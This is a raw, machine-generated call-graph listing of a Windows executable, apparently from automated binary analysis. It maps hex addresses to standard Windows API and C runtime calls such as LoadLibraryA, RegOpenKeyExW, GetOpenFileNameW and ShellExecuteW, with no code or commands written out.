108623->108624 108634 c7e6e3 108624->108634 108638 c7e6a6 108627->108638 108631 c7e694 2 API calls 108630->108631 108632 c7e43f GetNativeSystemInfo 108631->108632 108632->108611 108633->108599 108635 c7e55b 108634->108635 108636 c7e6ec LoadLibraryA 108634->108636 108635->108599 108635->108600 108636->108635 108637 c7e6fd GetProcAddress 108636->108637 108637->108635 108639 c7e5ac 108638->108639 108640 c7e6af LoadLibraryA 108638->108640 108639->108609 108639->108610 108640->108639 108641 c7e6c0 GetProcAddress 108640->108641 108641->108639 108642 cd1eca 108647 c7be17 108642->108647 108646 cd1ed9 108648 c6d3d2 48 API calls 108647->108648 108649 c7be85 108648->108649 108655 c7c929 108649->108655 108651 c7bf22 108652 c7bf3e 108651->108652 108658 c7c8b7 48 API calls _memmove 108651->108658 108654 c81b2a 52 API calls __cinit 108652->108654 108654->108646 108659 c7c955 108655->108659 108658->108651 108660 c7c948 108659->108660 108661 c7c962 108659->108661 108660->108651 108661->108660 108662 c7c969 RegOpenKeyExW 108661->108662 108662->108660 108663 c7c983 RegQueryValueExW 108662->108663 108664 c7c9b9 RegCloseKey 108663->108664 108665 c7c9a4 108663->108665 108664->108660 108665->108664 108666 c86a80 108667 c86a8c __tzset_nolock 108666->108667 108703 c88b7b GetStartupInfoW 108667->108703 108669 c86a91 108705 c8a937 GetProcessHeap 108669->108705 108671 c86ae9 108672 c86af4 108671->108672 108790 c86bd0 47 API calls 3 library calls 108671->108790 108706 c887d7 108672->108706 108675 c86afa 108676 c86b05 __RTC_Initialize 108675->108676 108791 c86bd0 47 API calls 3 library calls 108675->108791 108727 c8ba66 108676->108727 108679 c86b14 108680 c86b20 GetCommandLineW 108679->108680 108792 c86bd0 47 API calls 3 library calls 108679->108792 108746 c93c2d GetEnvironmentStringsW 108680->108746 108683 c86b1f 108683->108680 108687 c86b45 108759 c93a64 108687->108759 108690 c86b4b 108691 c86b56 108690->108691 108794 c81d7b 47 API calls 3 library calls 108690->108794 108773 c81db5 108691->108773 108694 c86b5e 108695 c86b69 __wwincmdln 108694->108695 108795 c81d7b 47 API calls 3 library calls 108694->108795 108777 c63682 108695->108777 108698 c86b7d 108699 c86b8c 108698->108699 108796 c82011 47 API calls _doexit 108698->108796 108797 c81da6 47 API calls _doexit 108699->108797 108702 c86b91 __tzset_nolock 108704 c88b91 108703->108704 108704->108669 108705->108671 108798 c81e5a 30 API calls 2 library calls 108706->108798 108708 c887dc 108799 c88ab3 InitializeCriticalSectionAndSpinCount 108708->108799 108710 c887e1 108711 c887e5 108710->108711 108801 c88afd TlsAlloc 108710->108801 108800 c8884d 50 API calls 2 library calls 108711->108800 108714 c887ea 108714->108675 108715 c887f7 108715->108711 108716 c88802 108715->108716 108802 c87616 108716->108802 108719 c88844 108810 c8884d 50 API calls 2 library calls 108719->108810 108722 c88849 108722->108675 108723 c88823 108723->108719 108724 c88829 108723->108724 108809 c88724 47 API calls 4 library calls 108724->108809 108726 c88831 GetCurrentThreadId 108726->108675 108728 c8ba72 __tzset_nolock 108727->108728 108819 c88984 108728->108819 108730 c8ba79 108731 c87616 __calloc_crt 47 API calls 108730->108731 108732 c8ba8a 108731->108732 108733 c8baf5 GetStartupInfoW 108732->108733 108735 c8ba95 __tzset_nolock @_EH4_CallFilterFunc@8 108732->108735 108741 c8bc33 108733->108741 108743 c8bb0a 108733->108743 108734 c8bcf7 108826 c8bd0b LeaveCriticalSection _doexit 108734->108826 108735->108679 108737 c8bc7c GetStdHandle 108737->108741 108738 c87616 __calloc_crt 47 API calls 108738->108743 108739 c8bc8e GetFileType 108739->108741 108740 c8bb58 108740->108741 108744 c8bb98 InitializeCriticalSectionAndSpinCount 108740->108744 108745 c8bb8a GetFileType 108740->108745 108741->108734 108741->108737 108741->108739 108742 c8bcbb InitializeCriticalSectionAndSpinCount 108741->108742 108742->108741 108743->108738 108743->108740 108743->108741 108744->108740 108745->108740 108745->108744 108747 c93c3e 108746->108747 108748 c86b30 108746->108748 108865 c87660 47 API calls __malloc_crt 108747->108865 108753 c9382b GetModuleFileNameW 108748->108753 108751 c93c64 _memmove 108752 c93c7a FreeEnvironmentStringsW 108751->108752 108752->108748 108754 c9385f _wparse_cmdline 108753->108754 108755 c86b3a 108754->108755 108756 c93899 108754->108756 108755->108687 108793 c81d7b 47 API calls 3 library calls 108755->108793 108866 c87660 47 API calls __malloc_crt 108756->108866 108758 c9389f _wparse_cmdline 108758->108755 108760 c93a7d __NMSG_WRITE 108759->108760 108764 c93a75 108759->108764 108761 c87616 __calloc_crt 47 API calls 108760->108761 108770 c93aa6 __NMSG_WRITE 108761->108770 108762 c93afd 108763 c828ca _free 47 API calls 108762->108763 108763->108764 108764->108690 108765 c87616 __calloc_crt 47 API calls 108765->108770 108766 c93b22 108767 c828ca _free 47 API calls 108766->108767 108767->108764 108769 c93b39 108868 c87ab0 IsProcessorFeaturePresent 108769->108868 108770->108762 108770->108764 108770->108765 108770->108766 108770->108769 108867 c93317 47 API calls __mbsnbicoll_l 108770->108867 108772 c93b45 108772->108690 108774 c81dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 108773->108774 108776 c81e00 __IsNonwritableInCurrentImage 108774->108776 108891 c81b2a 52 API calls __cinit 108774->108891 108776->108694 108778 cd23b5 108777->108778 108779 c6369c 108777->108779 108780 c636d6 IsThemeActive 108779->108780 108892 c82025 108780->108892 108784 c63702 108904 c632de SystemParametersInfoW SystemParametersInfoW 108784->108904 108786 c6370e 108905 c6374e GetCurrentDirectoryW 108786->108905 108789 c6373b 108789->108698 108790->108672 108791->108676 108792->108683 108796->108699 108797->108702 108798->108708 108799->108710 108800->108714 108801->108715 108805 c8761d 108802->108805 108804 c8765a 108804->108719 108808 c88b59 TlsSetValue 108804->108808 108805->108804 108806 c8763b Sleep 108805->108806 108811 c93e5a 108805->108811 108807 c87652 108806->108807 108807->108804 108807->108805 108808->108723 108809->108726 108810->108722 108812 c93e65 108811->108812 108816 c93e80 __calloc_impl 108811->108816 108813 c93e71 108812->108813 108812->108816 108818 c8889e 47 API calls __getptd_noexit 108813->108818 108815 c93e90 HeapAlloc 108815->108816 108817 c93e76 108815->108817 108816->108815 108816->108817 108817->108805 108818->108817 108820 c889a8 EnterCriticalSection 108819->108820 108821 c88995 108819->108821 108820->108730 108827 c88a0c 108821->108827 108823 c8899b 108823->108820 108851 c81d7b 47 API calls 3 library calls 108823->108851 108826->108735 108828 c88a18 __tzset_nolock 108827->108828 108829 c88a39 108828->108829 108830 c88a21 108828->108830 108831 c88a37 108829->108831 108837 c88aa1 __tzset_nolock 108829->108837 108852 c88e52 47 API calls __NMSG_WRITE 108830->108852 108831->108829 108855 c87660 47 API calls __malloc_crt 108831->108855 108834 c88a26 108853 c88eb2 47 API calls 6 library calls 108834->108853 108835 c88a4d 108838 c88a63 108835->108838 108839 c88a54 108835->108839 108837->108823 108843 c88984 __lock 46 API calls 108838->108843 108856 c8889e 47 API calls __getptd_noexit 108839->108856 108840 c88a2d 108854 c81d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108840->108854 108845 c88a6a 108843->108845 108844 c88a59 108844->108837 108846 c88a79 InitializeCriticalSectionAndSpinCount 108845->108846 108847 c88a8e 108845->108847 108848 c88a94 108846->108848 108857 c828ca 108847->108857 108863 c88aaa LeaveCriticalSection _doexit 108848->108863 108852->108834 108853->108840 108855->108835 108856->108844 108858 c828d3 RtlFreeHeap 108857->108858 108862 c828fc _free 108857->108862 108859 c828e8 108858->108859 108858->108862 108864 c8889e 47 API calls __getptd_noexit 108859->108864 108861 c828ee GetLastError 108861->108862 108862->108848 108863->108837 108864->108861 108865->108751 108866->108758 108867->108770 108869 c87abb 108868->108869 108874 c87945 108869->108874 108873 c87ad6 108873->108772 108875 c8795f _memset __call_reportfault 108874->108875 108876 c8797f IsDebuggerPresent 108875->108876 108882 c88e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 108876->108882 108879 c87a66 108881 c88e27 GetCurrentProcess TerminateProcess 108879->108881 108880 c87a43 __call_reportfault 108883 c8b4bf 108880->108883 108881->108873 108882->108880 108884 c8b4c9 IsProcessorFeaturePresent 108883->108884 108885 c8b4c7 108883->108885 108887 c94560 108884->108887 108885->108879 108890 c9450f 5 API calls 2 library calls 108887->108890 108889 c94643 108889->108879 108890->108889 108891->108776 108893 c88984 __lock 47 API calls 108892->108893 108894 c82030 108893->108894 108950 c88ae8 LeaveCriticalSection 108894->108950 108896 c636fb 108897 c8208d 108896->108897 108898 c820b1 108897->108898 108899 c82097 108897->108899 108898->108784 108899->108898 108951 c8889e 47 API calls __getptd_noexit 108899->108951 108901 c820a1 108952 c87aa0 8 API calls __mbsnbicoll_l 108901->108952 108903 c820ac 108903->108784 108904->108786 108953 c64257 108905->108953 108907 c6377f IsDebuggerPresent 108908 cd21b7 MessageBoxA 108907->108908 108909 c6378d 108907->108909 108912 cd21d0 108908->108912 108910 c63852 108909->108910 108909->108912 108913 c637aa 108909->108913 108911 c63859 SetCurrentDirectoryW 108910->108911 108914 c63716 SystemParametersInfoW 108911->108914 109114 ca2f5b 48 API calls 108912->109114 109017 c63bff 108913->109017 108914->108789 108917 cd21e0 108923 cd21f6 SetCurrentDirectoryW 108917->108923 108919 c637c8 GetFullPathNameW 109029 c634f3 108919->109029 108922 c6380f 108924 c63818 108922->108924 109115 c9be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 108922->109115 108923->108914 109044 c630a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 108924->109044 108927 cd2213 108927->108924 108930 cd2224 GetModuleFileNameW 108927->108930 109116 c6caee 108930->109116 108931 c63822 108933 c63837 108931->108933 108935 c63598 67 API calls 108931->108935 109052 c6e1f0 108933->109052 108935->108933 108937 cd224c 109120 c639e8 48 API calls 2 library calls 108937->109120 108938 cd2271 109123 c639e8 48 API calls 2 library calls 108938->109123 108942 cd2257 109121 c639e8 48 API calls 2 library calls 108942->109121 108943 cd226d GetForegroundWindow ShellExecuteW 108947 cd22a5 Mailbox 108943->108947 108947->108910 108948 cd2264 109122 c639e8 48 API calls 2 library calls 108948->109122 108950->108896 108951->108901 108952->108903 109124 c63c70 108953->109124 108957 c64278 GetModuleFileNameW 109141 c634c1 108957->109141 108962 c6caee 48 API calls 108963 c642ba 108962->108963 109156 c6d380 108963->109156 108965 c642ca Mailbox 108966 c6caee 48 API calls 108965->108966 108967 c642f2 108966->108967 108968 c6d380 55 API calls 108967->108968 108969 c64305 Mailbox 108968->108969 108970 c6caee 48 API calls 108969->108970 108971 c64316 108970->108971 109160 c6d2d2 108971->109160 108973 c64328 Mailbox 108974 c6d3d2 48 API calls 108973->108974 108975 c6433b 108974->108975 109166 c64477 108975->109166 108979 c64355 108980 c6435f 108979->108980 108981 cd20f7 108979->108981 108982 c81bc7 _W_store_winword 59 API calls 108980->108982 108983 c64477 48 API calls 108981->108983 108984 c6436a 108982->108984 108985 cd210b 108983->108985 108984->108985 108986 c64374 108984->108986 108988 c64477 48 API calls 108985->108988 108987 c81bc7 _W_store_winword 59 API calls 108986->108987 108990 c6437f 108987->108990 108989 cd2127 108988->108989 108991 cd212f GetModuleFileNameW 108989->108991 108990->108991 108992 c64389 108990->108992 108993 c64477 48 API calls 108991->108993 108994 c81bc7 _W_store_winword 59 API calls 108992->108994 108995 cd2160 108993->108995 108996 c64394 108994->108996 109210 c6c935 48 API calls 108995->109210 108998 c643d6 108996->108998 109000 cd2185 _wcscpy 108996->109000 109003 c64477 48 API calls 108996->109003 108999 c643e7 108998->108999 108998->109000 109182 c63320 108999->109182 109008 c64477 48 API calls 109000->109008 109001 cd216e 109002 c64477 48 API calls 109001->109002 109005 cd217d 109002->109005 109006 c643b8 _wcscpy 109003->109006 109005->109000 109011 c64477 48 API calls 109006->109011 109007 c643ff 109193 c714a0 109007->109193 109009 cd21ab 109008->109009 109009->109009 109011->108998 109012 c714a0 48 API calls 109014 c6440f 109012->109014 109014->109012 109015 c64477 48 API calls 109014->109015 109016 c64451 Mailbox 109014->109016 109209 c67bef 48 API calls 109014->109209 109015->109014 109016->108907 109018 cd3ce4 _memset 109017->109018 109019 c63c1f 109017->109019 109021 cd3cf6 GetOpenFileNameW 109018->109021 109729 c631b8 109019->109729 109021->109019 109023 c637c0 109021->109023 109022 c63c28 109736 c63a67 SHGetMalloc 109022->109736 109023->108910 109023->108919 109025 c63c31 109741 c63b45 GetFullPathNameW 109025->109741 109804 c6a716 109029->109804 109031 c63501 109043 c63575 109031->109043 109815 c621dd 86 API calls 109031->109815 109033 c6350a 109033->109043 109816 c65460 88 API calls Mailbox 109033->109816 109035 c63513 109036 c63517 GetFullPathNameW 109035->109036 109035->109043 109037 c67e53 48 API calls 109036->109037 109038 c63541 109037->109038 109039 c67e53 48 API calls 109038->109039 109040 c6354e 109039->109040 109041 cd66b4 _wcscat 109040->109041 109042 c67e53 48 API calls 109040->109042 109042->109043 109043->108917 109043->108922 109045 c6310f 109044->109045 109046 cd21b0 109044->109046 109821 c6318a 109045->109821 109050 c63185 109051 c62e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 109050->109051 109051->108931 109053 c6e216 109052->109053 109112 c6e226 Mailbox 109052->109112 109054 c6e670 109053->109054 109053->109112 109974 c7ecee 346 API calls 109054->109974 109056 c63842 109056->108910 109113 c62b94 Shell_NotifyIconW _memset 109056->109113 109058 c6e681 109058->109056 109060 c6e68e 109058->109060 109059 c6e26c PeekMessageW 109059->109112 109976 c7ec33 346 API calls Mailbox 109060->109976 109062 cd5b13 Sleep 109062->109112 109063 c6e695 LockWindowUpdate DestroyWindow GetMessageW 109063->109056 109066 c6e6c7 109063->109066 109064 c6e4e7 109064->109056 109975 c6322e 16 API calls 109064->109975 109068 cd62a7 TranslateMessage DispatchMessageW GetMessageW 109066->109068 109068->109068 109069 cd62d7 109068->109069 109069->109056 109070 c6e657 PeekMessageW 109070->109112 109071 c8010a 48 API calls 109071->109112 109072 c6e517 timeGetTime 109072->109112 109075 cd5dfc WaitForSingleObject 109078 cd5e19 GetExitCodeProcess CloseHandle 109075->109078 109075->109112 109076 c6e641 TranslateMessage DispatchMessageW 109076->109070 109077 cd6147 Sleep 109107 cd5cce Mailbox 109077->109107 109078->109112 109079 c6d3d2 48 API calls 109079->109107 109080 c61000 322 API calls 109080->109112 109081 c6e6cc timeGetTime 109977 c7cf79 49 API calls 109081->109977 109083 cd5feb Sleep 109083->109107 109086 c7e3a5 timeGetTime 109086->109107 109087 cd61de GetExitCodeProcess 109090 cd620a CloseHandle 109087->109090 109091 cd61f4 WaitForSingleObject 109087->109091 109089 cd5cea Sleep 109089->109112 109090->109107 109091->109090 109091->109112 109092 cd5cd7 Sleep 109092->109089 109093 cc8a48 108 API calls 109093->109107 109095 c61dce 107 API calls 109095->109107 109096 cd6266 Sleep 109096->109112 109097 c7cf79 49 API calls 109097->109112 109100 c6caee 48 API calls 109100->109107 109103 c6d380 55 API calls 109103->109107 109107->109079 109107->109086 109107->109087 109107->109089 109107->109092 109107->109093 109107->109095 109107->109096 109107->109100 109107->109103 109107->109112 109980 ca56dc 49 API calls Mailbox 109107->109980 109981 c7cf79 49 API calls 109107->109981 109982 c61000 346 API calls 109107->109982 110023 cbd12a 50 API calls 109107->110023 110024 ca8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 109107->110024 110025 ca6f5b 63 API calls 3 library calls 109107->110025 109108 c6caee 48 API calls 109108->109112 109109 cad520 86 API calls 109109->109112 109111 c6d380 55 API calls 109111->109112 109112->109059 109112->109062 109112->109064 109112->109070 109112->109071 109112->109072 109112->109075 109112->109076 109112->109077 109112->109080 109112->109081 109112->109083 109112->109089 109112->109097 109112->109107 109112->109108 109112->109109 109112->109111 109827 c6e7e0 109112->109827 109834 c6ea00 109112->109834 109884 c744e0 109112->109884 109901 c6e7b0 346 API calls Mailbox 109112->109901 109902 c73680 109112->109902 109972 c7f381 TranslateAcceleratorW 109112->109972 109973 c7ed1a IsDialogMessageW GetClassLongW 109112->109973 109978 c6c935 48 API calls 109112->109978 109979 cc8b20 48 API calls 109112->109979 109983 c6fa40 109112->109983 109113->108910 109114->108917 109115->108927 109117 c6cafd __NMSG_WRITE _memmove 109116->109117 109118 c8010a 48 API calls 109117->109118 109119 c6cb3b 109118->109119 109119->108937 109119->108938 109120->108942 109121->108948 109122->108943 109123->108943 109125 c6d3d2 48 API calls 109124->109125 109126 c63c80 109125->109126 109127 c6a359 109126->109127 109128 c6a366 __ftell_nolock 109127->109128 109129 c67e53 48 API calls 109128->109129 109134 c6a4cc Mailbox 109128->109134 109131 c6a398 109129->109131 109140 c6a3ce Mailbox 109131->109140 109211 c6a4f6 109131->109211 109132 c6a4f6 48 API calls 109132->109140 109133 c6a49f 109133->109134 109135 c6caee 48 API calls 109133->109135 109134->108957 109137 c6a4c0 109135->109137 109136 c6caee 48 API calls 109136->109140 109215 c65b47 48 API calls _memmove 109137->109215 109140->109132 109140->109133 109140->109134 109140->109136 109214 c65b47 48 API calls _memmove 109140->109214 109216 c63f9b 109141->109216 109144 c634ea 109153 c68182 109144->109153 109147 cd34c3 109148 c828ca _free 47 API calls 109147->109148 109150 cd34d0 109148->109150 109151 c63e39 84 API calls 109150->109151 109152 cd34d9 109151->109152 109152->109152 109154 c8010a 48 API calls 109153->109154 109155 c642ad 109154->109155 109155->108962 109157 c6d38b 109156->109157 109158 c6d3b4 109157->109158 109718 c6d772 55 API calls 109157->109718 109158->108965 109161 c6d30a 109160->109161 109162 c6d2df 109160->109162 109161->108973 109165 c6d2e6 109162->109165 109720 c6d349 53 API calls 109162->109720 109165->109161 109719 c6d349 53 API calls 109165->109719 109167 c64481 109166->109167 109168 c6449a 109166->109168 109721 c6c935 48 API calls 109167->109721 109169 c67e53 48 API calls 109168->109169 109171 c64347 109169->109171 109172 c81bc7 109171->109172 109173 c81c48 109172->109173 109174 c81bd3 109172->109174 109724 c81c5a 59 API calls 3 library calls 109173->109724 109178 c81bf8 109174->109178 109722 c8889e 47 API calls __getptd_noexit 109174->109722 109177 c81c55 109177->108979 109178->108979 109179 c81bdf 109723 c87aa0 8 API calls __mbsnbicoll_l 109179->109723 109181 c81bea 109181->108979 109183 c63334 109182->109183 109185 c63339 Mailbox 109182->109185 109725 c6342c 48 API calls 109183->109725 109189 c63347 109185->109189 109726 c6346e 48 API calls 109185->109726 109187 c8010a 48 API calls 109188 c633d8 109187->109188 109191 c8010a 48 API calls 109188->109191 109189->109187 109190 c63422 109189->109190 109190->109007 109192 c633e3 109191->109192 109192->109007 109194 c71606 109193->109194 109197 c714b2 109193->109197 109194->109014 109195 c714be 109201 c714c9 109195->109201 109728 c6346e 48 API calls 109195->109728 109197->109195 109198 c8010a 48 API calls 109197->109198 109199 cd5299 109198->109199 109202 c8010a 48 API calls 109199->109202 109200 c7156d 109200->109014 109201->109200 109203 c8010a 48 API calls 109201->109203 109207 cd52a4 109202->109207 109204 c715af 109203->109204 109205 c715c2 109204->109205 109727 c7d6b4 48 API calls 109204->109727 109205->109014 109207->109195 109208 c8010a 48 API calls 109207->109208 109208->109207 109209->109014 109210->109001 109212 c6b8a7 48 API calls 109211->109212 109213 c6a501 109212->109213 109213->109131 109214->109140 109215->109134 109281 c63f5d 109216->109281 109221 c63fc6 LoadLibraryExW 109291 c63e78 109221->109291 109222 cd5830 109224 c63e39 84 API calls 109222->109224 109226 cd5837 109224->109226 109228 c63e78 3 API calls 109226->109228 109230 cd583f 109228->109230 109229 c63fed 109229->109230 109231 c63ff9 109229->109231 109317 c6417d 109230->109317 109233 c63e39 84 API calls 109231->109233 109235 c634e2 109233->109235 109235->109144 109240 cacc82 109235->109240 109237 cd5866 109323 c641cb 109237->109323 109239 cd5873 109241 c641a7 83 API calls 109240->109241 109242 caccf1 109241->109242 109496 cace59 94 API calls 2 library calls 109242->109496 109244 cacd03 109245 c6417d 64 API calls 109244->109245 109273 cacd07 109244->109273 109246 cacd1e 109245->109246 109247 c6417d 64 API calls 109246->109247 109248 cacd2e 109247->109248 109249 c6417d 64 API calls 109248->109249 109250 cacd49 109249->109250 109251 c6417d 64 API calls 109250->109251 109252 cacd64 109251->109252 109253 c641a7 83 API calls 109252->109253 109254 cacd7b 109253->109254 109255 c845ec __malloc_crt 47 API calls 109254->109255 109256 cacd82 109255->109256 109257 c845ec __malloc_crt 47 API calls 109256->109257 109258 cacd8c 109257->109258 109259 c6417d 64 API calls 109258->109259 109260 cacda0 109259->109260 109497 cac846 GetSystemTimeAsFileTime 109260->109497 109262 cacdb3 109263 cacdc8 109262->109263 109264 cacddd 109262->109264 109265 c828ca _free 47 API calls 109263->109265 109266 cace42 109264->109266 109267 cacde3 109264->109267 109268 cacdce 109265->109268 109270 c828ca _free 47 API calls 109266->109270 109498 cac251 118 API calls __fcloseall 109267->109498 109271 c828ca _free 47 API calls 109268->109271 109270->109273 109271->109273 109272 cace3a 109274 c828ca _free 47 API calls 109272->109274 109273->109147 109275 c63e39 109273->109275 109274->109273 109276 c63e43 109275->109276 109277 c63e4a 109275->109277 109499 c84274 109276->109499 109279 c63e6a FreeLibrary 109277->109279 109280 c63e59 109277->109280 109279->109280 109280->109147 109328 c63f20 109281->109328 109284 c63f85 109286 c63f96 109284->109286 109287 c63f8d FreeLibrary 109284->109287 109288 c84129 109286->109288 109287->109286 109336 c8413e 109288->109336 109290 c63fba 109290->109221 109290->109222 109415 c63eb3 109291->109415 109295 c63eb1 109298 c64010 109295->109298 109296 c63ea8 FreeLibrary 109296->109295 109297 c63e9f 109297->109295 109297->109296 109299 c8010a 48 API calls 109298->109299 109300 c64025 109299->109300 109301 c64bce 48 API calls 109300->109301 109302 c64031 _memmove 109301->109302 109303 c6406c 109302->109303 109304 c64161 109302->109304 109305 c64129 109302->109305 109306 c641cb 57 API calls 109303->109306 109434 cad03f 93 API calls 109304->109434 109423 c631f2 CreateStreamOnHGlobal 109305->109423 109314 c64075 109306->109314 109309 c6417d 64 API calls 109309->109314 109310 c64109 109310->109229 109312 cd5794 109313 c641a7 83 API calls 109312->109313 109315 cd57a8 109313->109315 109314->109309 109314->109310 109314->109312 109429 c641a7 109314->109429 109316 c6417d 64 API calls 109315->109316 109316->109310 109318 cd587d 109317->109318 109319 c6418f 109317->109319 109458 c844ae 109319->109458 109322 cac846 GetSystemTimeAsFileTime 109322->109237 109324 cd58bf 109323->109324 109325 c641da 109323->109325 109478 c84af5 109325->109478 109327 c641e2 109327->109239 109332 c63f32 109328->109332 109331 c63f08 LoadLibraryA GetProcAddress 109331->109284 109333 c63f28 109332->109333 109334 c63f3b LoadLibraryA 109332->109334 109333->109284 109333->109331 109334->109333 109335 c63f4c GetProcAddress 109334->109335 109335->109333 109338 c8414a __tzset_nolock 109336->109338 109337 c8415d 109384 c8889e 47 API calls __getptd_noexit 109337->109384 109338->109337 109341 c8418e 109338->109341 109340 c84162 109385 c87aa0 8 API calls __mbsnbicoll_l 109340->109385 109355 c8f278 109341->109355 109344 c84193 109345 c841a9 109344->109345 109346 c8419c 109344->109346 109348 c841d3 109345->109348 109349 c841b3 109345->109349 109386 c8889e 47 API calls __getptd_noexit 109346->109386 109369 c8f390 109348->109369 109387 c8889e 47 API calls __getptd_noexit 109349->109387 109351 c8416d __tzset_nolock @_EH4_CallFilterFunc@8 109351->109290 109356 c8f284 __tzset_nolock 109355->109356 109357 c88984 __lock 47 API calls 109356->109357 109358 c8f292 109357->109358 109359 c8f309 109358->109359 109365 c88a0c __mtinitlocknum 47 API calls 109358->109365 109367 c8f302 109358->109367 109392 c85ade 48 API calls __lock 109358->109392 109393 c85b48 LeaveCriticalSection LeaveCriticalSection _doexit 109358->109393 109394 c87660 47 API calls __malloc_crt 109359->109394 109362 c8f310 109363 c8f31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 109362->109363 109362->109367 109363->109367 109364 c8f37c __tzset_nolock 109364->109344 109365->109358 109389 c8f387 109367->109389 109370 c8f3b0 __wopenfile 109369->109370 109371 c8f3ca 109370->109371 109383 c8f585 109370->109383 109401 c8247b 59 API calls 2 library calls 109370->109401 109399 c8889e 47 API calls __getptd_noexit 109371->109399 109373 c8f3cf 109400 c87aa0 8 API calls __mbsnbicoll_l 109373->109400 109375 c841de 109388 c84200 LeaveCriticalSection LeaveCriticalSection _fprintf 109375->109388 109376 c8f5e8 109396 c97179 109376->109396 109379 c8f57e 109379->109383 109402 c8247b 59 API calls 2 library calls 109379->109402 109381 c8f59d 109381->109383 109403 c8247b 59 API calls 2 library calls 109381->109403 109383->109371 109383->109376 109384->109340 109385->109351 109386->109351 109387->109351 109388->109351 109395 c88ae8 LeaveCriticalSection 109389->109395 109391 c8f38e 109391->109364 109392->109358 109393->109358 109394->109362 109395->109391 109404 c96961 109396->109404 109398 c97192 109398->109375 109399->109373 109400->109375 109401->109379 109402->109381 109403->109383 109406 c9696d __tzset_nolock 109404->109406 109405 c9697f 109407 c8889e __mbsnbicoll_l 47 API calls 109405->109407 109406->109405 109408 c969b6 109406->109408 109409 c96984 109407->109409 109410 c96a28 __wsopen_helper 110 API calls 109408->109410 109411 c87aa0 __mbsnbicoll_l 8 API calls 109409->109411 109412 c969d3 109410->109412 109414 c9698e __tzset_nolock 109411->109414 109413 c969fc __wsopen_helper LeaveCriticalSection 109412->109413 109413->109414 109414->109398 109419 c63ec5 109415->109419 109418 c63ef0 LoadLibraryA GetProcAddress 109418->109297 109420 c63e91 109419->109420 109421 c63ece LoadLibraryA 109419->109421 109420->109297 109420->109418 109421->109420 109422 c63edf GetProcAddress 109421->109422 109422->109420 109424 c6320c FindResourceExW 109423->109424 109428 c63229 109423->109428 109425 cd57d3 LoadResource 109424->109425 109424->109428 109426 cd57e8 SizeofResource 109425->109426 109425->109428 109427 cd57fc LockResource 109426->109427 109426->109428 109427->109428 109428->109303 109430 c641b6 109429->109430 109433 cd589d 109429->109433 109435 c8471d 109430->109435 109432 c641c4 109432->109314 109434->109303 109439 c84729 __tzset_nolock 109435->109439 109436 c84737 109448 c8889e 47 API calls __getptd_noexit 109436->109448 109438 c8475d 109450 c85a9f 109438->109450 109439->109436 109439->109438 109441 c8473c 109449 c87aa0 8 API calls __mbsnbicoll_l 109441->109449 109442 c84763 109456 c8468e 81 API calls 4 library calls 109442->109456 109445 c84747 __tzset_nolock 109445->109432 109446 c84772 109457 c84794 LeaveCriticalSection LeaveCriticalSection _fprintf 109446->109457 109448->109441 109449->109445 109451 c85aaf 109450->109451 109452 c85ad1 EnterCriticalSection 109450->109452 109451->109452 109453 c85ab7 109451->109453 109454 c85ac7 109452->109454 109455 c88984 __lock 47 API calls 109453->109455 109454->109442 109455->109454 109456->109446 109457->109445 109461 c844c9 109458->109461 109460 c641a0 109460->109322 109462 c844d5 __tzset_nolock 109461->109462 109463 c84518 109462->109463 109464 c844eb _memset 109462->109464 109465 c84510 __tzset_nolock 109462->109465 109466 c85a9f __lock_file 48 API calls 109463->109466 109474 c8889e 47 API calls __getptd_noexit 109464->109474 109465->109460 109468 c8451e 109466->109468 109476 c842eb 62 API calls 6 library calls 109468->109476 109469 c84505 109475 c87aa0 8 API calls __mbsnbicoll_l 109469->109475 109472 c84534 109477 c84552 LeaveCriticalSection LeaveCriticalSection _fprintf 109472->109477 109474->109469 109475->109465 109476->109472 109477->109465 109479 c84b01 __tzset_nolock 109478->109479 109480 c84b0f 109479->109480 109481 c84b24 109479->109481 109492 c8889e 47 API calls __getptd_noexit 109480->109492 109483 c85a9f __lock_file 48 API calls 109481->109483 109485 c84b2a 109483->109485 109484 c84b14 109493 c87aa0 8 API calls __mbsnbicoll_l 109484->109493 109494 c8479c 55 API calls 5 library calls 109485->109494 109488 c84b1f __tzset_nolock 109488->109327 109489 c84b35 109495 c84b55 LeaveCriticalSection LeaveCriticalSection _fprintf 109489->109495 109491 c84b47 109491->109488 109492->109484 109493->109488 109494->109489 109495->109491 109496->109244 109497->109262 109498->109272 109500 c84280 __tzset_nolock 109499->109500 109501 c842ac 109500->109501 109502 c84294 109500->109502 109504 c85a9f __lock_file 48 API calls 109501->109504 109508 c842a4 __tzset_nolock 109501->109508 109528 c8889e 47 API calls __getptd_noexit 109502->109528 109506 c842be 109504->109506 109505 c84299 109529 c87aa0 8 API calls __mbsnbicoll_l 109505->109529 109512 c84208 109506->109512 109508->109277 109513 c8422b 109512->109513 109514 c84217 109512->109514 109520 c84227 109513->109520 109531 c83914 109513->109531 109571 c8889e 47 API calls __getptd_noexit 109514->109571 109517 c8421c 109572 c87aa0 8 API calls __mbsnbicoll_l 109517->109572 109530 c842e3 LeaveCriticalSection LeaveCriticalSection _fprintf 109520->109530 109524 c84245 109548 c8f782 109524->109548 109526 c8424b 109526->109520 109527 c828ca _free 47 API calls 109526->109527 109527->109520 109528->109505 109529->109508 109530->109508 109532 c83927 109531->109532 109536 c8394b 109531->109536 109533 c835c3 __flswbuf 47 API calls 109532->109533 109532->109536 109534 c83944 109533->109534 109573 c8bd14 109534->109573 109537 c8f8e6 109536->109537 109538 c8423f 109537->109538 109539 c8f8f3 109537->109539 109541 c835c3 109538->109541 109539->109538 109540 c828ca _free 47 API calls 109539->109540 109540->109538 109542 c835cd 109541->109542 109543 c835e2 109541->109543 109679 c8889e 47 API calls __getptd_noexit 109542->109679 109543->109524 109545 c835d2 109680 c87aa0 8 API calls __mbsnbicoll_l 109545->109680 109547 c835dd 109547->109524 109549 c8f78e __tzset_nolock 109548->109549 109550 c8f7ae 109549->109550 109551 c8f796 109549->109551 109553 c8f82b 109550->109553 109558 c8f7d8 109550->109558 109696 c8886a 47 API calls __getptd_noexit 109551->109696 109700 c8886a 47 API calls __getptd_noexit 109553->109700 109554 c8f79b 109697 c8889e 47 API calls __getptd_noexit 